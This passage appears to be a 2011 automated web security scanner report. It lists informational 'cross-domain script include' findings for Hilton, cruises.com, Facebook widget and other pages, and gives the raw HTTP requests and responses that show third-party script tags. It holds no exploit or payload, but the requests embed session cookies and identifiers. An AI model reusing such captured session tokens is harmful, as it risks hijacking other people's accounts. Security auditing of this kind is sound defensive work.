P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2062
Content-Type: application/x-javascript
Set-Cookie: NSC_d18efm_qppm_iuuq=ffffffff09419e6d45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Middle1') {
document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5762.286676.OPENTABLE.COM/B5568318.11;sz=300x250;click0=http://oasc18005.247real
...[SNIP]...
DTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('> <SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5762.286676.OPENTABLE.COM/B5568318.11;abr=!ie;sz=300x250;click0=http://oasc18005.247realmedia.com/RealMedia/ads/click_lx.ads/www.opentable.opt/home/L22/346292571/Middle1/RGM/OPT-2712_Chase_300x250_Home/OPT-2712_Chase_300x250_Home_081911.html/4d686437616b356934616b41434d6658?;pc=OAS_OPT-2712_Chase_300x250_Home_081911;ord=346292571?"> </SCRIPT>
...[SNIP]...
18.4. https://secure.hilton.com/en/hhonors/signup/hhonors_enroll.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hhonors/signup/hhonors_enroll.jhtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/hhonors/signup/hhonors_enroll.jhtml HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.hilton.com/en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; mmcore.tst=0.960; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635943626:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 143713
Date: Mon, 03 Oct 2011 12:58:54 GMT
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

   
                           <title>Hilton HHonors (R) Enrollment Form</title>
               
               
...[SNIP]...
<td><script src=https://seal.verisign.com/getseal?host_name=secure.hilton.com&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
18.5. https://secure.hilton.com/en/hi/login/login.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hi/login/login.jhtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 33818
Date: Mon, 03 Oct 2011 12:58:38 GMT
Connection: keep-alive


<!--suppress top nav sign in widget -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


    <HTML>
<HEAD>

           <TITLE>Login Page</TITLE>
           
           
           <LINK re
...[SNIP]...
<td><script src=https://seal.verisign.com/getseal?host_name=secure.hilton.com&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
18.6. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hi/mytravelplanner/my_account.jhtml

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /en/hi/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/widget_homepage.jhtml.8 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Content-Length: 798
Cache-Control: max-age=0
Origin: http://www.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777

%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=%2Fen%2Fhi%2Flogin%2Flogin.jhtml&_D%3A%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=+&%2Fcom%2Fhilton%2F
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Location: /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21190
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:36 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 49638

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>



...[SNIP]...
<td><script src=https://seal.verisign.com/getseal?host_name=secure.hilton.com&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
18.7. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e1s1 HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:53:59 GMT
Content-Length: 28801
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.hotelicopter.com/js/connector.js"></script>
...[SNIP]...
18.8. https://secure3.hilton.com/skins/en_US/js_comp/reservation.comp.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /skins/en_US/js_comp/reservation.comp.min.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /skins/en_US/js_comp/reservation.comp.min.js HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://secure3.hilton.com/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e1s1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Sep 2011 17:08:41 GMT
ETag: "d4be-719b9840"
Accept-Ranges: bytes
Content-Length: 54462
Content-Type: application/javascript
Expires: Mon, 03 Oct 2011 12:53:59 GMT
Date: Mon, 03 Oct 2011 12:53:59 GMT
Connection: keep-alive

/*
* Copyright (c) 2009 John Resig
* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Copyright 2007 Yehuda Katz,
...[SNIP]...
</a>';drawbutton6(a);}}function drawbutton(a){d=new Date();if(isopen(d,timezone,a)){document.write('<script language="JavaScript" src="http://as00.estara.com/as/InitiateCall2.jsp?accountid=20010320"><\/script>
...[SNIP]...
18.9. http://www.cloudscan.me/p/cross-site-scripting-information.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /p/cross-site-scripting-information.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/cross-site-scripting-information.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://xss.cx/kb/apple/blind-boolean-sql-injection-cwe89-capec66-database-user-admin-example-poc-report-priktsafnet.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.cloudscan.me
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Mon, 03 Oct 2011 13:56:04 GMT
Date: Mon, 03 Oct 2011 13:56:04 GMT
Cache-Control: private, max-age=0
Last-Modified: Mon, 03 Oct 2011 02:00:26 GMT
ETag: "361bc00f-503e-447a-ab50-c39d044a9c7d"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 68887
Server: GSE

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
</iframe>
<script type="text/javascript" src="http://www.blogger.com/static/v1/jsbin/957670695-comment_from_post_iframe.js"></script>
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/3692008350-widgets.js"></script>
...[SNIP]...
18.10. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2F%3Ffbc_channel%3D1&id=50243286972&name=&width=280&connections=0&stream=&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.42.127
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:49 GMT
Content-Length: 8515

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
18.11. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /widgets/fan.php HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.140.118
Connection: close
Date: Mon, 03 Oct 2011 13:02:59 GMT
Content-Length: 4517

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yr/r/6DHUppDc9DE.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
...[SNIP]...
18.12. http://www.cruises.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:40:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 103184
Content-Type: text/html
Cache-control: private
Content-Length: 103184


<script language="JavaScript">


    function CallUrchin(event_name)
{
       
           pageTracker._trackPageview(event_name);
           //alert(event_name);
       
       return true;
}
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- google service script -->
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
   </script>
...[SNIP]...
</div>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<!-- PUT THIS GOOGLE TAG IN THE head SECTION -->
               <script type="text/javascript"
               src="http://partner.googleadservices.com/gampad/google_service.js">
               </script>
...[SNIP]...
18.13. http://www.cruises.com/cs/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /cs/default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cs/default.asp HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/promotion/balcony-suite-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.7.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 65631
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 65631


<script language="JavaScript">


    function CallUrchin(event_name)
{
       
           pageTracker._trackPageview(event_name);
           //alert(event_name);
       
       return true;
}
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
18.14. http://www.cruises.com/i/shadow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /i/shadow.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /i/shadow.png HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.16.8.1317645879081; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:44:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 31431
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 31431


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
   <head>
        <title>Page unavailable</title>
       
               <meta name="ROBOTS" content="ALL,NOODP" />
               <meta name="GOOG
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- google service script -->
               <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
               </script>
...[SNIP]...
18.15. http://www.cruises.com/promotion/balcony-suite-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /promotion/balcony-suite-cruises.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /promotion/balcony-suite-cruises.do HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.6.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:22 GMT
Server: Apache
Content-Length: 366262
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:43:22 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
<div >


<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!--topcruises.ftl end-->

           
               <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div align="center">


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
18.16. http://www.cruises.com/promotion/weekend-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /promotion/weekend-cruises.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /promotion/weekend-cruises.do HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
